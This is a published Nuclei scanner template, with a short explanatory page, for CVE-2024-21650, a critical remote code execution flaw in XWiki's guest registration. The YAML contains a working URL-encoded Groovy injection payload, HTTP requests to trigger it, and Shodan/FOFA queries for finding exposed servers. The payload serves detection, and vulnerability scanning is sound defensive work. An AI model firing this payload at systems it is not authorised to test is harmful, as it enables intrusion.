XWiki < 4.10.20 - Remote code execution
ID: CVE-2024-21650
Severity: critical
Author: ritikchaddha
Tags: cve,cve2024,xwiki,rce
Description
Section titled “Description”XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the “first name” or “last name” fields during user registration. This impacts all installations that have user registration enabled for guests.
YAML Source
Section titled “YAML Source”id: CVE-2024-21650
info: name: XWiki < 4.10.20 - Remote code execution author: ritikchaddha severity: critical description: | XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. impact: | Successful exploitation could lead to remote code execution. remediation: | This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1. reference: - https://jira.xwiki.org/browse/XWIKI-21173 - https://nvd.nist.gov/vuln/detail/CVE-2024-21650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2024-21650 cwe-id: CWE-95 epss-score: 0.0015 epss-percentile: 0.50461 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 4 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2024,xwiki,rce
variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" email: "{{randstr}}%40{{rand_base(5)}}.com" firstname: "%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%7D%7D%7B%7Bgroovy%7D%7Dservices.logging.getLogger%28%22attacker%22%29.error%28%22Attack+succeeded%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D" lastname: "{{rand_base(5)}}"
http: - raw: - | GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1 Host: {{Hostname}}
- | POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
parent=xwiki%3AMain.UserDirectory®ister_first_name={{firstname}}®ister_last_name={{lastname}}&xwikiname={{user}}®ister_password={{pass}}®ister2_password={{pass}}®ister_email="{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}
payloads: path: - - /xwiki
stop-at-first-match: true host-redirects: true max-redirects: 2 skip-variables-check: true
matchers-condition: and matchers: - type: word part: body_2 words: - "Registration successful" - "Attack succeeded" - "Failed to execute the [groovy]" condition: and
- type: status status: - 200
extractors: - type: regex part: body name: token group: 1 regex: - data\-xwiki\-form\-token="([a-zA-Z0-9]+)"> internal: true# digest: 4b0a0048304602210098b5586e566a529e46f57ea9d7fb75686a84da1cd7e8d5a7f445816ec541d916022100a93cde22d5f29ba927d4a495dcbe5c89ed1731fa564fbf596031c811f64a060f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-21650.yaml"